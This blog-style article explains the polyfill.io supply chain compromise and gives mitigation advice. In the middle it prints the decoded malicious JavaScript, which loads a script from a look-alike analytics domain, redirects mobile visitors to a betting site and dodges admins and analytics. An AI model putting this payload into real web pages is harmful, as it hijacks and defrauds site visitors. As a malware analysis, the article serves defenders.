A New Wave of Supply Chain Attacks: The Polyfill Supply Chain Attack
Update June 25th: Google has already started blocking Google Ads for eCommerce sites that use polyfill.io.
Imagine one of the most widely used libraries on the internet being compromised, affecting over 100,000 websites. Sounds like a nightmare? Unfortunately, this has become a reality with the polyfill supply chain attack. The polyfill.js is a popular open-source library that helps support older browsers, and it’s been embedded in websites like JSTOR, Intuit, and the World Economic Forum. However, a sinister turn of events has unfolded.
A Brief Background
In February this year, a Chinese company acquired both the domain and the GitHub account of polyfill.io. Since then, the domain has been injecting malware into mobile devices via any site that embeds cdn.polyfill.io. Despite complaints and reports, these were swiftly removed from the GitHub repository, creating a significant issue for many unsuspecting users.
The Attack Vector
The polyfill code is dynamically generated based on HTTP headers, presenting multiple attack vectors. One decoded malware by Sansec redirects mobile users to a sports betting site using a fake Google Analytics domain (www.googie-anaiytics.com). The malware is sophisticated, with specific protections against reverse engineering, activation only on specific mobile devices at specific times, and deactivation when it detects an admin user or web analytics service. This sophisticated method ensures it remains undetected in website statistics.
Recommendations and Alternatives
The original author of Polyfill recommends discontinuing its use as modern browsers no longer require it. Alternatives from Fastly and Cloudflare are available for those who still need polyfill support.
This incident is a textbook example of a supply chain attack, emphasizing the importance of monitoring the code your users are loading. Sansec offers a free CSP monitoring service, Sansec Watch, to help detect such issues. Additionally, their eComscan backend scanner has been updated to detect the compromised polyfill.io.
领英推荐
Example of Malicious Payload
The malicious payload demonstrates how it targets mobile devices, redirects users, and avoids detection. Here is an example of the code, with added readability for better understanding:
function isPc() {
try {
var _isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
_isMac = navigator.platform == "Mac68K" ||
navigator.platform == "MacPPC" ||
navigator.platform == "Macintosh" ||
navigator.platform == "MacIntel";
return _isMac || _isWin;
} catch (_0x44e1f6) {
return false;
}
}
function vfed_update(_0x5ae1f8) {
_0x5ae1f8 !== "" &&
loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {
if (usercache == true) {
window.location.href = _0x5ae1f8;
}
});
}
function check_tiaozhuan() {
var _isMobile = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
if (_isMobile) {
var _curHost = window.location.host,
_ref = document.referrer,
_redirectURL = "",
_kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
_rnd = Math.floor(Math.random() * 100 + 1),
_date = new Date(),
_hours = _date.getHours();
if (_curHost.indexOf("www.dxtv1.com") !== -1 || _curHost.indexOf("www.ys752.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else if (_curHost.indexOf("shuanshu.com.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_hours >= 0 && _hours < 2 && _rnd <= 10) {
_redirectURL = _kuurzaBitGet;
} else if (_hours >= 2 && _hours < 4 && _rnd <= 15) {
_redirectURL = _kuurzaBitGet;
} else if (_hours >= 4 && _hours < 7 && _rnd <= 20) {
_redirectURL = _kuurzaBitGet;
} else if (_hours >= 7 && _hours < 8 && _rnd <= 10) {
_redirectURL = _kuurzaBitGet;
} else if (_rnd <= 10) {
_redirectURL = _kuurzaBitGet;
}
}
if (_redirectURL != "" && !isPc() && document.cookie.indexOf("admin_id") == -1 && document.cookie.indexOf("adminlevels") == -1) {
vfed_update(_redirectURL);
}
}
}
let _outerPage = document.documentElement.outerHTML,
bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
aplausix = _outerPage.indexOf(".plausible.io") != -1,
statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
? setTimeout(check_tiaozhuan, 2000)
: check_tiaozhuan();
Indicators of Compromise
To protect your systems, be on the lookout for these URLs:
Stay Informed
To stay ahead of such threats, it’s crucial to remain informed and vigilant. Here are some resources that delve deeper into similar attacks and preventive measures:
In conclusion, the polyfill supply chain attack is a wake-up call for all of us. It highlights the critical importance of monitoring third-party libraries and ensuring the integrity of the software supply chain. By taking proactive steps, using trusted alternatives, and staying informed, we can mitigate such risks and protect our digital assets.